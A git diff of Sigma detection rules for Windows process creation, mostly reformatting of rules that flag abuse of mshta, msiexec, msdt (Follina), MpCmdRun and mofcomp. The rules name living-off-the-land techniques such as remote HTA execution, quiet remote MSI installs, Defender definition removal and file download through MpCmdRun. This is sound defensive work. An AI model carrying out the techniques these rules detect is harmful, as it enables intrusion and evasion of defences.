a/sigma/builtin/process_creation/proc_creation_win_mmc_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_mmc_susp_child_process.yml index 0e02f5721..3d42b0a79 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mmc_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mmc_susp_child_process.yml @@ -20,17 +20,17 @@ detection: selection1: ParentProcessName|endswith: \mmc.exe selection2: - - NewProcessName|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - \wscript.exe - - \cscript.exe - - \sh.exe - - \bash.exe - - \reg.exe - - \regsvr32.exe - - NewProcessName|contains: \BITSADMIN + - NewProcessName|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - \wscript.exe + - \cscript.exe + - \sh.exe + - \bash.exe + - \reg.exe + - \regsvr32.exe + - NewProcessName|contains: \BITSADMIN condition: process_creation and (all of selection*) fields: - NewProcessName diff --git a/sigma/builtin/process_creation/proc_creation_win_mofcomp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_mofcomp_execution.yml index 2a45456bd..9c7b8bbf1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mofcomp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mofcomp_execution.yml @@ -1,15 +1,10 @@ title: Potential Suspicious Mofcomp Execution id: 1dd05363-104e-4b4a-b963-196a534b03a1 status: experimental -description: 'Detects execution of the "mofcomp" utility as a child of a suspicious - shell or script running utility or by having a suspicious path in the commandline. - - The "mofcomp" utility parses a file containing MOF statements and adds the classes - and class instances defined in the file to the WMI repository. - +description: | + Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. + The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts - - ' references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml @@ -28,32 +23,32 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \mofcomp.exe - - OriginalFileName: mofcomp.exe + - NewProcessName|endswith: \mofcomp.exe + - OriginalFileName: mofcomp.exe selection_case: - - ParentProcessName|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - \wsl.exe - - \wscript.exe - - \cscript.exe - - CommandLine|contains: - - \AppData\Local\Temp - - \Users\Public\ - - \WINDOWS\Temp\ - - '%temp%' - - '%tmp%' - - '%appdata%' + - ParentProcessName|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - \wsl.exe + - \wscript.exe + - \cscript.exe + - CommandLine|contains: + - \AppData\Local\Temp + - \Users\Public\ + - \WINDOWS\Temp\ + - '%temp%' + - '%tmp%' + - '%appdata%' filter_main_wmiprvse: - CommandLine|contains: C:\Windows\TEMP\ - CommandLine|endswith: .mof + CommandLine|contains: C:\Windows\TEMP\ + CommandLine|endswith: .mof ParentProcessName: C:\Windows\System32\wbem\WmiPrvSE.exe filter_optional_null_parent: - CommandLine|contains: C:\Windows\TEMP\ - CommandLine|endswith: .mof - condition: process_creation and (all of selection_* and not 1 of filter_main_* - and not 1 of filter_optional_*) + # Sometimes the parent information isn't available from the Microsoft-Windows-Security-Auditing provider. + CommandLine|contains: C:\Windows\TEMP\ + CommandLine|endswith: .mof + condition: process_creation and (all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml b/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml index ec492162a..02bb67d4b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml @@ -1,11 +1,10 @@ title: Potential Mpclient.DLL Sideloading Via Defender Binaries id: 7002aa10-b8d4-47ae-b5ba-51ab07e228b9 related: - - id: 418dc89a-9808-4b87-b1d7-e5ae0cb6effc - type: similar + - id: 418dc89a-9808-4b87-b1d7-e5ae0cb6effc + type: similar status: experimental -description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes - ("MpCmdRun" and "NisSrv") from their non-default directory. +description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool author: Bhabesh Raj @@ -22,11 +21,11 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \MpCmdRun.exe - \NisSrv.exe filter_main_known_locations: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Program Files (x86)\Windows Defender\ - C:\Program Files\Microsoft Security Client\ - C:\Program Files\Windows Defender\ diff --git a/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml b/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml index 6cb992537..aeb886ec4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml @@ -21,12 +21,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: MpCmdRun.exe - - NewProcessName|endswith: \MpCmdRun.exe - - CommandLine|contains: MpCmdRun.exe - - Description: Microsoft Malware Protection Command Line Utility + - OriginalFileName: MpCmdRun.exe + - NewProcessName|endswith: \MpCmdRun.exe + - CommandLine|contains: MpCmdRun.exe + - Description: Microsoft Malware Protection Command Line Utility selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - DownloadFile - url condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml b/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml index 4a72c29bc..b99b8ab04 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml @@ -1,8 +1,7 @@ title: Windows Defender Definition Files Removed id: 9719a8aa-401c-41af-8108-ced7ec9cd75c status: test -description: Adversaries may disable security tools to avoid possible detection of - their tools and activities by removing Windows Defender Definition Files +description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \MpCmdRun.exe - - OriginalFileName: MpCmdRun.exe + - NewProcessName|endswith: \MpCmdRun.exe + - OriginalFileName: MpCmdRun.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -RemoveDefinitions' - ' -All' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_msbuild_susp_parent_process.yml b/sigma/builtin/process_creation/proc_creation_win_msbuild_susp_parent_process.yml index f164e275c..74f8afa09 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msbuild_susp_parent_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msbuild_susp_parent_process.yml @@ -17,8 +17,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \MSBuild.exe - - OriginalFileName: MSBuild.exe + - NewProcessName|endswith: \MSBuild.exe + - OriginalFileName: MSBuild.exe filter_parent: ParentProcessName|endswith: - \devenv.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml b/sigma/builtin/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml index d1ac9601c..c28a36aba 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml @@ -1,8 +1,7 @@ title: Potential Arbitrary Command Execution Using Msdt.EXE id: 258fc8ce-8352-443a-9120-8a11e4857fa5 status: test -description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" - binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability +description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability references: - https://twitter.com/nao_sec/status/1530196847679401984 - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ @@ -21,18 +20,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - NewProcessName|endswith: \msdt.exe + - OriginalFileName: msdt.exe selection_cmd_inline: - CommandLine|contains: IT_BrowseForFile= + CommandLine|contains: IT_BrowseForFile= selection_cmd_answerfile_flag: - CommandLine|contains: ' PCWDiagnostic' + CommandLine|contains: ' PCWDiagnostic' selection_cmd_answerfile_param: - CommandLine|contains: + CommandLine|contains: - ' /af ' - ' -af ' - condition: process_creation and (selection_img and (selection_cmd_inline or all - of selection_cmd_answerfile_*)) + condition: process_creation and (selection_img and (selection_cmd_inline or all of selection_cmd_answerfile_*)) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_msdt_susp_cab_options.yml b/sigma/builtin/process_creation/proc_creation_win_msdt_susp_cab_options.yml index 6dde97b28..2f9192bf2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msdt_susp_cab_options.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msdt_susp_cab_options.yml @@ -1,11 +1,10 @@ title: Suspicious Cabinet File Execution Via Msdt.EXE id: dc4576d4-7467-424f-9eee-fd2b02855fe0 related: - - id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3 - type: obsoletes + - id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3 + type: obsoletes status: test -description: Detects execution of msdt.exe using the "cab" flag which could indicates - suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 +description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 references: - https://twitter.com/nas_bench/status/1537896324837781506 - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab @@ -25,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - NewProcessName|endswith: \msdt.exe + - OriginalFileName: msdt.exe selection_cmd: - CommandLine|contains: + CommandLine|contains: - ' /cab ' - ' -cab ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_msdt_susp_parent.yml b/sigma/builtin/process_creation/proc_creation_win_msdt_susp_parent.yml index 109b55f31..ca9fc239e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msdt_susp_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msdt_susp_parent.yml @@ -1,8 +1,7 @@ title: Suspicious MSDT Parent Process id: 7a74da6b-ea76-47db-92cc-874ad90df734 status: test -description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 - / Follina exploitation +description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation references: - https://twitter.com/nao_sec/status/1530196847679401984 - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ @@ -33,9 +32,10 @@ detection: - \wmic.exe - \wscript.exe - \wsl.exe + # Note: office applications are covered by: 438025f9-5856-4663-83f7-52f878a70a50 selection_msdt: - - NewProcessName|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - NewProcessName|endswith: \msdt.exe + - OriginalFileName: msdt.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_msedge_proxy_download.yml b/sigma/builtin/process_creation/proc_creation_win_msedge_proxy_download.yml index 99cd600d2..7e033f98f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msedge_proxy_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msedge_proxy_download.yml @@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \msedge_proxy.exe - - OriginalFileName: msedge_proxy.exe + - NewProcessName|endswith: \msedge_proxy.exe + - OriginalFileName: msedge_proxy.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_mshta_http.yml b/sigma/builtin/process_creation/proc_creation_win_mshta_http.yml index 14a442703..27bee1913 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mshta_http.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mshta_http.yml @@ -1,9 +1,7 @@ title: Remotely Hosted HTA File Executed Via Mshta.EXE id: b98d0db6-511d-45de-ad02-e82a98729620 status: test -description: Detects execution of the "mshta" utility with an argument containing - the "http" keyword, which could indicate that an attacker is executing a remotely - hosted malicious hta file +description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file references: - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html author: Nasreddine Bencherchali (Nextron Systems) @@ -21,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \mshta.exe - - OriginalFileName: MSHTA.EXE + - NewProcessName|endswith: \mshta.exe + - OriginalFileName: MSHTA.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// - ftp:// diff --git a/sigma/builtin/process_creation/proc_creation_win_mshta_inline_vbscript.yml b/sigma/builtin/process_creation/proc_creation_win_mshta_inline_vbscript.yml index 9fefb0d4c..68c372d6d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mshta_inline_vbscript.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mshta_inline_vbscript.yml @@ -1,8 +1,7 @@ title: Wscript Shell Run In CommandLine id: 2c28c248-7f50-417a-9186-a85b223010ee status: experimental -description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in - the command, which could indicate a suspicious activity +description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity references: - https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html - https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/ @@ -20,13 +19,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - Wscript. - .Shell - .Run condition: process_creation and selection falsepositives: - - Inline scripting can be used by some rare third party applications or administrators. - Investigate and apply additional filters accordingly + - Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_mshta_javascript.yml b/sigma/builtin/process_creation/proc_creation_win_mshta_javascript.yml index 11904c1ed..d27815f5a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mshta_javascript.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mshta_javascript.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \mshta.exe - - OriginalFileName: MSHTA.EXE + - NewProcessName|endswith: \mshta.exe + - OriginalFileName: MSHTA.EXE selection_cli: - CommandLine|contains: javascript + CommandLine|contains: javascript condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_mshta_lethalhta_technique.yml b/sigma/builtin/process_creation/proc_creation_win_mshta_lethalhta_technique.yml index 48f2f3600..e25932d0c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mshta_lethalhta_technique.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mshta_lethalhta_technique.yml @@ -1,8 +1,7 @@ title: Potential LethalHTA Technique Execution id: ed5d72a6-f8f4-479d-ba79-02f6a80d7471 status: test -description: Detects potential LethalHTA technique where the "mshta.exe" is spawned - by an "svchost.exe" process +description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process references: - https://codewhitesec.blogspot.com/2018/07/lethalhta.html author: Markus Neis @@ -20,7 +19,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \svchost.exe - NewProcessName|endswith: \mshta.exe + NewProcessName|endswith: \mshta.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_mshta_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_mshta_susp_child_processes.yml index 7af0cea59..529cfa93d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mshta_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mshta_susp_child_processes.yml @@ -1,8 +1,7 @@ title: Suspicious MSHTA Child Process id: 03cc0c25-389f-4bf8-b48d-11878079f1ca status: test -description: Detects a suspicious process spawning from an "mshta.exe" process, which - could be indicative of a malicious HTA script execution +description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution references: - https://www.trustedsec.com/july-2015/malicious-htas/ author: Michael Haag @@ -24,27 +23,27 @@ detection: selection_parent: ParentProcessName|endswith: \mshta.exe selection_child: - - NewProcessName|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - \wscript.exe - - \cscript.exe - - \sh.exe - - \bash.exe - - \reg.exe - - \regsvr32.exe - - \bitsadmin.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE - - pwsh.dll - - wscript.exe - - cscript.exe - - Bash.exe - - reg.exe - - REGSVR32.EXE - - bitsadmin.exe + - NewProcessName|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - \wscript.exe + - \cscript.exe + - \sh.exe + - \bash.exe + - \reg.exe + - \regsvr32.exe + - \bitsadmin.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE + - pwsh.dll + - wscript.exe + - cscript.exe + - Bash.exe + - reg.exe + - REGSVR32.EXE + - bitsadmin.exe condition: process_creation and (all of selection*) falsepositives: - Printer software / driver installations diff --git a/sigma/builtin/process_creation/proc_creation_win_mshta_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_mshta_susp_execution.yml index b2dbe9255..e2db5d102 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mshta_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mshta_susp_execution.yml @@ -1,8 +1,7 @@ title: MSHTA Suspicious Execution 01 id: cc7abbd0-762b-41e3-8a26-57ad50d2eea3 status: test -description: Detection for mshta.exe suspicious execution patterns sometimes involving - file polyglotism +description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism references: - http://blog.sevagas.com/?Hacking-around-HTA-files - https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356 @@ -27,19 +26,20 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - vbscript - .jpg - .png - .lnk + # - '.chm' # could be prone to false positives - .xls - .doc - .zip - .dll - NewProcessName|endswith: \mshta.exe + # - '.exe' + NewProcessName|endswith: \mshta.exe condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_mshta_susp_pattern.yml b/sigma/builtin/process_creation/proc_creation_win_mshta_susp_pattern.yml index c3bf93514..61a2ec97a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mshta_susp_pattern.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mshta_susp_pattern.yml @@ -20,10 +20,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \mshta.exe - - OriginalFileName: MSHTA.EXE + - NewProcessName|endswith: \mshta.exe + - OriginalFileName: MSHTA.EXE selection_susp: - CommandLine|contains: + # Suspicious parents + CommandLine|contains: - \AppData\Local\ - C:\ProgramData\ - C:\Users\Public\ @@ -36,18 +37,21 @@ detection: - \regsvr32.exe - \rundll32.exe - \wscript.exe + # Suspicious folders filter_img: - - NewProcessName|startswith: - - C:\Windows\System32\ - - C:\Windows\SysWOW64\ - - CommandLine|contains: - - .htm - - .hta - - CommandLine|endswith: - - mshta.exe - - mshta - condition: process_creation and (all of selection_* or (selection_img and not - filter_img)) + # Filter legit Locations + - NewProcessName|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + # Suspicious extensions + - CommandLine|contains: + - .htm + - .hta + # Filter simple execution + - CommandLine|endswith: + - mshta.exe + - mshta + condition: process_creation and (all of selection_* or (selection_img and not filter_img)) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_msiexec_dll.yml b/sigma/builtin/process_creation/proc_creation_win_msiexec_dll.yml index c2bbc9fe9..007e47070 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msiexec_dll.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msiexec_dll.yml @@ -20,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \msiexec.exe - - OriginalFileName: \msiexec.exe + - NewProcessName|endswith: \msiexec.exe + - OriginalFileName: \msiexec.exe selection_flag: - CommandLine|contains: + CommandLine|contains: - ' /z ' - ' -z ' selection_dll: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_msiexec_embedding.yml b/sigma/builtin/process_creation/proc_creation_win_msiexec_embedding.yml index c1ac8c4fb..38413163f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msiexec_embedding.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msiexec_embedding.yml @@ -1,8 +1,7 @@ title: Suspicious MsiExec Embedding Parent id: 4a2a2c3e-209f-4d01-b513-4155a540b469 status: test -description: Adversaries may abuse msiexec.exe to proxy the execution of malicious - payloads +description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md author: frack113 @@ -22,18 +21,18 @@ detection: ParentCommandLine|contains|all: - MsiExec.exe - '-Embedding ' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe - \cmd.exe filter_splunk_ufw: - CommandLine|contains: C:\Program Files\SplunkUniversalForwarder\bin\ - NewProcessName|endswith: :\Windows\System32\cmd.exe + CommandLine|contains: C:\Program Files\SplunkUniversalForwarder\bin\ + NewProcessName|endswith: :\Windows\System32\cmd.exe filter_vs: - - CommandLine|contains: \DismFoDInstall.cmd - - ParentCommandLine|contains|all: - - '\MsiExec.exe -Embedding ' - - Global\MSI0000 + - CommandLine|contains: \DismFoDInstall.cmd + - ParentCommandLine|contains|all: + - '\MsiExec.exe -Embedding ' + - Global\MSI0000 condition: process_creation and (selection and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_msiexec_execute_dll.yml b/sigma/builtin/process_creation/proc_creation_win_msiexec_execute_dll.yml index 90e29a3e9..a7db7a8c5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msiexec_execute_dll.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msiexec_execute_dll.yml @@ -1,12 +1,9 @@ title: Suspicious Msiexec Execute Arbitrary DLL id: 6f4191bb-912b-48a8-9ce7-682769541e6d status: test -description: 'Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. - - Msiexec.exe is the command-line utility for the Windows Installer and is thus - commonly associated with executing installation packages (.msi) - - ' +description: | + Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. + Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md @@ -25,24 +22,24 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' /y' - ' -y' - NewProcessName|endswith: \msiexec.exe + NewProcessName|endswith: \msiexec.exe filter_apple: - CommandLine|contains: + CommandLine|contains: - \MsiExec.exe" /Y "C:\Program Files\Bonjour\mdnsNSP.dll - \MsiExec.exe" /Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll - \MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll - \MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll - \MsiExec.exe" /Y "C:\Windows\CCM\ - - \MsiExec.exe" /Y C:\Windows\CCM\ + - \MsiExec.exe" /Y C:\Windows\CCM\ # also need non-quoted execution - \MsiExec.exe" -Y "C:\Program Files\Bonjour\mdnsNSP.dll - \MsiExec.exe" -Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll - \MsiExec.exe" -Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll - \MsiExec.exe" -Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll - \MsiExec.exe" -Y "C:\Windows\CCM\ - - \MsiExec.exe" -Y C:\Windows\CCM\ + - \MsiExec.exe" -Y C:\Windows\CCM\ # also need non-quoted execution condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Legitimate script diff --git a/sigma/builtin/process_creation/proc_creation_win_msiexec_install_quiet.yml b/sigma/builtin/process_creation/proc_creation_win_msiexec_install_quiet.yml index 4ddbd70f2..3f66e5ac7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msiexec_install_quiet.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msiexec_install_quiet.yml @@ -1,12 +1,9 @@ title: Msiexec Quiet Installation id: 79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5 status: experimental -description: 'Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. - - Msiexec.exe is the command-line utility for the Windows Installer and is thus - commonly associated with executing installation packages (.msi) - - ' +description: | + Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. + Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md @@ -25,10 +22,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \msiexec.exe - - OriginalFileName: msiexec.exe + - NewProcessName|endswith: \msiexec.exe + - OriginalFileName: msiexec.exe selection_cli: - CommandLine|contains: + # Note that there is no space before and after the arguments because it's possible to write a commandline as such + # Example: msiexec -q/i [MSI Package] + CommandLine|contains: - /i - -i - /package @@ -38,10 +37,11 @@ detection: - /j - -j selection_quiet: - CommandLine|contains: + CommandLine|contains: - /q - -q filter_user_temp: + # The %temp% is a very common location for installers ParentProcessName|startswith: C:\Users\ ParentProcessName|contains: \AppData\Local\Temp\ filter_system_temp: diff --git a/sigma/builtin/process_creation/proc_creation_win_msiexec_install_remote.yml b/sigma/builtin/process_creation/proc_creation_win_msiexec_install_remote.yml index 9d1b32f9e..5abdbd715 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msiexec_install_remote.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msiexec_install_remote.yml @@ -1,8 +1,8 @@ title: Suspicious Msiexec Quiet Install From Remote Location id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c related: - - id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f - type: similar + - id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f + type: similar status: test description: Detects usage of Msiexec.exe to install packages hosted remotely quietly references: @@ -20,10 +20,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \msiexec.exe - - OriginalFileName: msiexec.exe + - NewProcessName|endswith: \msiexec.exe + - OriginalFileName: msiexec.exe selection_cli: - CommandLine|contains: + # Note that there is no space before and after the arguments because it's possible to write a commandline as such + # Example: msiexec -q/i [MSI Package] + CommandLine|contains: - /i - -i - /package @@ -33,11 +35,11 @@ detection: - /j - -j selection_quiet: - CommandLine|contains: + CommandLine|contains: - /q - -q selection_remote: - CommandLine|contains: + CommandLine|contains: - http - \\\\ condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_msiexec_masquerading.yml b/sigma/builtin/process_creation/proc_creation_win_msiexec_masquerading.yml index 803969747..0be6d877b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msiexec_masquerading.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msiexec_masquerading.yml @@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \msiexec.exe - - OriginalFileName: \msiexec.exe + - NewProcessName|endswith: \msiexec.exe + - OriginalFileName: \msiexec.exe filter: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Windows\System32\ - C:\Windows\SysWOW64\ - C:\Windows\WinSxS\ diff --git a/sigma/builtin/process_creation/proc_creation_win_msiexec_web_install.yml b/sigma/builtin/process_creation/proc_creation_win_msiexec_web_install.yml index 2187a5e7c..5a88b7ee8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msiexec_web_install.yml +++ 